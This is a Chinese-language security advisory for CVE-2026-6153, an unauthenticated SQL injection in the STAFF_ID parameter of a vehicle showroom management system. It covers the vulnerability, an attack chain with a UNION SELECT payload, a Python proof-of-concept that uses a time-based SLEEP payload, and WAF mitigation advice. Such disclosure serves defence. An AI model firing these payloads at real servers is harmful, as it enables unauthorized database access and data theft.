CVE-2026-6153 Vehicle Showroom SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-6153

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Vehicle Showroom Management System

漏洞概述

code-projects Vehicle Showroom Management System 1.0版本被发现存在严重的安全漏洞。该漏洞位于文件`/util/StaffDetailsFunction.php`中，由于应用程序未对用户输入的`STAFF_ID`参数进行严格的过滤和校验，导致攻击者可以构造恶意SQL语句进行注入攻击。由于漏洞无需身份认证且可远程利用，攻击者可通过此漏洞窃取数据库敏感信息、篡改数据或破坏系统可用性。

技术细节

该漏洞属于典型的SQL注入漏洞，其根本原因在于直接拼接SQL查询语句。在受影响版本的`/util/StaffDetailsFunction.php`文件中，处理`STAFF_ID`参数时未使用参数化查询或预编译语句（如PDO），而是直接将其嵌入到SQL命令中。攻击者可以通过发送特制的HTTP请求（GET或POST），在`STAFF_ID`参数中注入SQL控制字符（如单引号`'`、注释符`--`、以及`UNION SELECT`语句）。由于CVSS向量显示攻击复杂度低且无需用户交互，未经授权的攻击者可远程利用此漏洞。成功利用后，攻击者能够绕过应用程序逻辑，直接访问底层数据库，执行读取、修改、删除数据的操作，严重威胁系统的机密性、完整性和可用性。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在使用code-projects Vehicle Showroom Management System 1.0版本，并定位到`/util/StaffDetailsFunction.php`接口。

STEP 2

武器化

攻击者构造针对`STAFF_ID`参数的恶意SQL注入Payload（例如：`1' UNION SELECT user(), version()-- -`）。

STEP 3

交付

攻击者向目标服务器发送包含恶意Payload的HTTP GET或POST请求。

STEP 4

利用

服务器后端脚本未过滤Payload，直接将其拼接到SQL查询中并交由数据库执行，导致攻击者控制SQL语句。

STEP 5

影响

数据库返回查询结果或执行写入操作，导致敏感数据泄露、数据被篡改或服务器响应异常。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

def check_sqli(url):
    """
    PoC for CVE-2026-6153 SQL Injection
    Target parameter: STAFF_ID
    """
    target_endpoint = url.rstrip('/') + '/util/StaffDetailsFunction.php'
    
    # Payload to test for time-based blind SQL injection
    # Checking if the database waits for 5 seconds
    payload = "1' AND SLEEP(5)-- -"
    
    params = {
        'STAFF_ID': payload
    }
    
    try:
        print(f"[+] Sending payload to {target_endpoint}")
        response = requests.get(target_endpoint, params=params, timeout=10)
        
        # If response time is greater than 5 seconds (plus network latency), it's likely vulnerable
        if response.elapsed.total_seconds() >= 5:
            print("[!] Vulnerability confirmed: SQL Injection detected via time delay.")
        else:
            print("[-] Vulnerability not detected or payload failed.")
            
    except requests.RequestException as e:
        print(f"[Error] Request failed: {e}")

if __name__ == "__main__":
    target = "http://target-ip/showroom" # Replace with actual target URL
    check_sqli(target)

影响范围

code-projects Vehicle Showroom Management System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议在Web应用防火墙（WAF）中部署规则，拦截针对`/util/StaffDetailsFunction.php`文件中包含SQL关键词（如UNION, SELECT, SLEEP等）的请求。同时，如果该功能非核心业务必需，可临时限制对该文件的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6153
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6153
3 Details https://www.cvedetails.com/cve/CVE-2026-6153/
4 VulDB https://vuldb.com/cve/CVE-2026-6153
5 Link https://code-projects.org/
6 Link https://github.com/zheng-lv/CVE-/issues/4
7 Link https://vuldb.com/submit/796315
8 Link https://vuldb.com/vuln/357033
9 Link https://vuldb.com/vuln/357033/cti